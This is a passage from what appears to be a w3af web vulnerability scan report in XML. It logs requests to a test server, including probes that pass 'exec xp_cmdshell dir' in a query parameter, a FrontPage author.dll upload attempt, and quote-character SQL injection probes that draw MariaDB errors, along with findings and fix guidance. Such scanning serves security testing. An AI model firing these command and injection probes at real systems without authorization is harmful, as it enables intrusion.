                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="83">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=exec%20master..xp_cmdshell%20dir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="84">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=exec%20xp_cmdshell%20dir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="214">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="215">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="207">
                <http-request>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="99">
                <http-request>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="100">
                <http-request>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="102">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ptgWm.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/ptgWm.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="211">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="212">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="126">
                <http-request>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L3B0Z1dtLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGgubVdndHA=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="127">
                <http-request>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[43]" method="GET" name="Omitted server header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The remote HTTP Server omitted the &quot;server&quot; header in its response.</description>
        <http-transactions>
            <http-transaction id="43">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[82]" method="GET" name="Powered-by header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The x-powered-by header for the target HTTP server is &quot;PHP/5.6.9&quot;.</description>
        <http-transactions>
            <http-transaction id="82">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[687]" method="POST" name="SQL injection" plugin="sqli" severity="High" url="http://10.12.68.43:31337/post" var="pseudo">
        <description>SQL injection in a MySQL database was found at: &quot;http://10.12.68.43:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=Hello%20World&amp;pseudo=a%27b%22c%27d%22&quot; which modifies the &quot;pseudo&quot; parameter.</description>
        <long-description>Due to the requirement for dynamic content of today's web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.

To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself. An SQL injection occurs when a value originating from the client's request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.

The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.

This injection was detected as the tool was able to cause the server to respond to the request with a database related error.</long-description>
        <fix-guidance>The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.

Additionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.</fix-guidance>
        <fix-effort>50</fix-effort>
        <references>
            <reference title="SecuriTeam" url="http://www.securiteam.com/securityreviews/5DP0N1P76E.html"/>
            <reference title="Wikipedia" url="http://en.wikipedia.org/wiki/SQL_injection"/>
            <reference title="OWASP" url="https://www.owasp.org/index.php/SQL_Injection"/>
            <reference title="WASC" url="http://projects.webappsec.org/w/page/13246963/SQL%20Injection"/>
            <reference title="W3 Schools" url="http://www.w3schools.com/sql/sql_injection.asp"/>
            <reference title="UnixWiz" url="http://unixwiz.net/techtips/sql-injection.html"/>
        </references>
        <http-transactions>
            <http-transaction id="687">
                <http-request>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="45" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz1hJTI3YiUyMmMlMjdkJTIy
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;', 'Hello World')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[691]" method="POST" name="SQL injection" plugin="sqli" severity="High" url="http://10.12.68.43:31337/post" var="message">
        <description>SQL injection in a MySQL database was found at: &quot;http://10.12.68.43:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=a%27b%22c%27d%22&amp;pseudo=56&quot; which modifies the &quot;message&quot; parameter.</description>
        <long-description>Due to the requirement for dynamic content of today's web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.

To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself. An SQL injection occurs when a value originating from the client's request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.

The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.

This injection was detected as the tool was able to cause the server to respond to the request with a database related error.</long-description>
        <fix-guidance>The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.

Additionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.</fix-guidance>
        <fix-effort>50</fix-effort>
        <references>
            <reference title="SecuriTeam" url="http://www.securiteam.com/securityreviews/5DP0N1P76E.html"/>
            <reference title="Wikipedia" url="http://en.wikipedia.org/wiki/SQL_injection"/>
            <reference title="OWASP" url="https://www.owasp.org/index.php/SQL_Injection"/>
            <reference title="WASC" url="http://projects.webappsec.org/w/page/13246963/SQL%20Injection"/>
            <reference title="W3 Schools" url="http://www.w3schools.com/sql/sql_injection.asp"/>
            <reference title="UnixWiz" url="http://unixwiz.net/techtips/sql-injection.html"/>
        </references>
        <http-transactions>
            <http-transaction id="691">
                <http-request>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="34" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1hJTI3YiUyMmMlMjdkJTIyJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[36, 58, 66, 86, 208, 241, 254, 327, 380, 420, 437, 482, 516, 540, 569, 628, 652, 678, 705, 765, 791, 821, 847, 871, 887]" method="GET" name="DAV methods enabled" plugin="allowed_methods" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The URL &quot;http://10.12.68.43:31337/&quot; has the following allowed methods. These include DAV methods and should be disabled: *, CHECKOUT, CONNECT, COPY, GET, HEAD, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SUBSCRIBE, TRACE, UNLOCK, UNSUBSCRIBE.</description>
        <http-transactions>
            <http-transaction id="36">
                <http-request>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="58">
                <http-request>
                    <status>MKCOL http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="66">
